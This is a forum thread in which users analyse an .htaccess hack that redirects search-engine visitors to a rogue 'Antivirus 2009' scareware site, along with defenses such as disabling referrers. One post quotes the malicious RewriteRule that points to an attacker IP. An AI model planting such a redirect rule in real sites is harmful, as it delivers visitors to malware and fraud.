 Doctor FourMy other vehicle is a TARDISPremium
join:2000-09-05
Dallas, TX | Example of an htaccess hack There have been quite a few reports of these from time to time in this forum, like the one I encountered for Lover's Pizzeria (which is still quite active as of my post). The Sunbelt Blog has an example of one, where if you visit the site by copying and pasting the URL, it is normal. But if you follow a Google result, you get redirected to a site which tries to get visitors to install Antivirus 2009. The htaccess file has been hacked so that if a referrer is found, a 302 redirect occurs to the malicious site.
»sunbeltblog.blogspot.com/2009/01···ite.html
As for the one I found, I checked it again. Avast blocked professional-virus-scan [dot] com as a malicious site.
--
"The trouble with computers, of course, is that they are very sophisticated idiots." - Doctor Who (from Robot)
|
|
| One nice thing about Opera is that it has the option to NOT send referrer information. I would hope that would stop this sort of attack. |
|
mysecPremium
join:2005-11-29
kudos:4
2 edits | Yes, if Referrer Logging is unchecked, you will go directly to the legitimate site.
Also, if Referrer is not disabled and you are redirected, if scripting is disabled, the bogus antivirus page loads but nothing happens because the page calls a .js file to do the dirty work:
script src='window.js'> /script>
The exploit no longer launches from Google, which now intercepts the action:
_______________________________________________________
However, as of this writing, the exploit works from a Yahoo search page.
----
rich |
|
| reply to Doctor Four
Interesting. I have used search engines to ensure I browse straight to a site whose domain name I am unsure of instead of rolling the dice and possibly going to a squatter/malicious site. It took a minute to figure out why they would do this as it seems it would cut out part of their 'clientèle'. Clever. |
|
mysecPremium
join:2005-11-29
kudos:4
2 edits | I've notified many sites that have been affected by this and it always turns out to be a problem with the Hosting service and not the site itself.
If you set your firewall to alert, you can follow the steps.
Here is the IP for offenbachers.com:
_______________________________________________
First, connection to offenbachers.com:
_______________________________________________
Then, the re-directs:
________________________________________________
And finally the rogue antivirus page loads:
________________________________________________
As Walter Cronkite, former CBS news anchor used to say,
"That's the way it is."
----
rich |
|
Reviews:
 ·WestNet Broadband
| reply to mysec
said by mysec:Yes, if Referrer Logging is unchecked, you get the 302 error. Thanks, that is good to know as it is something I've always turned off in Opera.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke |
|
| reply to Doctor Four
Opera is not alone in optionally blocking HTTP referers. This can also be done in Firefox and Seamonkey: In about:config, there is a variable called "network.http.sendRefererHeader" which can be set to zero to prevent sending such headers. The situation can be verified using some of the tests at grc.com. |
|
| reply to Doctor Four
Very clever. They're probably doing it this way because they've found an exploit in the web servers which allow them to append lines to text files. All it takes is one line added to .htaccess to redirect requests to the rogue site. This also has the added "benefit" of not alerting the owner of the site too quickly as he is likely to visit it via a direct link, without sending referrer information.
--
Mischel Internet Security - Developer of TrojanHunter |
|
|
|
Reviews:
·WestNet Broadband
| reply to Doctor Four
They must be looking at more than just this one way as I remember this topic I was redirected in Opera, referrer off.
Guess they have a plethora of exploits to work with and as mentioned if the web pages you visit are poorly written or not updated the vector's window becomes ten-fold.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke |
|
mysecPremium
join:2005-11-29
kudos:4
4 edits | reply to Doctor Four
Informative old blog here:
My Website Got Hacked!
»blog.riskythinking.com/2008/11/m···ked.html
It could be titled, "Who is to blame?"
It's evidently the Hosting service, and you can see how an htaaccess page is modified with a Rewrite Rule:
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
________________________________________________________________
Disabling "Automatic Redirect" in your browser, you can watch the exploit from a different perspective. At each alert, I clicked the link to bring up the next one:
___________________________________________________
Next would be the rogue antivirus site.
----
rich |
|
| reply to norwegian
To norwegian: Javascript is a very popular method... I wouldn't be surprised if that was used as well. That would explain the popup box you got back then. Lots of ways for the bad guys to do their thing, unfortunately. |
|
mysecPremium
join:2005-11-29
kudos:4 | reply to norwegian
said by norwegian:I remember this topic I was redirected in Opera, referrer off.
Well, norwegian, it still redirects!
----
rich |
|
|
Is it still live?
|
|
mysecPremium
join:2005-11-29
kudos:4 | Yes
|
|
Reviews:
·WestNet Broadband
| That's hard to believe.
That original post was from the 9/11/08.
And we are worried about moral issues and filtering down under??????
So that link is using javascript as mentioned by VikingBob  as well as the refferer then if I understand your 2 posts?
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke |
|
Reviews:
·MTS
2 edits | The .htaccess usually does the redirect - but javascript can do that, too. The popup could be javascript or something else. Examination would be needed - I don't have a machine for playing with to look.
Sophos has a blog entry today on .htaccess attacks:
»www.sophos.com/security/blog/200···608.html |
|
Reviews:
·WestNet Broadband
|
Who is to know if they have not done anything other than a piccie or email, but the image of the download of AV2009 suggests a spyware is critical, but a trojan is medium?
Interesting article though.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke
|
|
mysecPremium
join:2005-11-29
kudos:4 | said by norwegian:So that link is using javascript as mentioned by VikingBob as well as the refferer then if I understand your 2 posts?
Yes. This is easy to test. It works the same as the offenbachers.com link discussed above.
With Referrer disabled, the legitimate site loads from Yahoo Search:
____________________________________________________
With Referrer enabled and Javascript disabled, the redirect loads the bogus site but nothing happens.
____________________________________________________
This is because everthing from this point runs via javascript:
____________________________________________________
I reload with Javascript enabled and the first action is the popup warning:
__________________________________________________________
Another page, _freescan.html is cached which downloads other Javascript files, and initiates the scan. Here is some of that code. The "fileslist2.js file for example, contains the list of "virusses" that supposedly the scanner finds on your system. As the fake scan runs, these files appear in the "now scanning" bar indicating to the unsuspecting victim that indeed, the computer is terribly infected, and to bring that point home, a Warning pops up following the scan:
_________________________________________________
At this point, no matter what you click, this code will call the download:
_________________________________________________
If cancel is selected, the user is set in a loop where the download prompt keeps coming back.
Unlike previous exploits, in these, the user can easily close the window or the browser. You may remember one where the user had to close the IE process in Task Manager. Even so, in both cases an infection cannot take place until the user selects to Open [Run], or Save and then run the file.
I would like to point out that I've seen that some people do not understand that
OPEN=Download and Run (execute).
SAVE=Download. Nothing executes until the user clicks to run the file after it is downloaded.
Note that the exploit prompts the user to select RUN or OPEN so that the file will execute automatically as soon as it is downloaded.
_________________________________________________________
I will select SAVE and you can see that the file downloads just sits there:
__________________________________________________________
This is to re-emphasize that in this particular exploit, the user must take some action to get the file to download/execute in order to become infected.
However an earlier Referrer exploit from a year or so ago had a remote code execution component for users with an unpatched IE6, unless something intervened to stop the executable from automatically downloading and executing:
_______________________________________________
And so it goes...
----
rich |
|
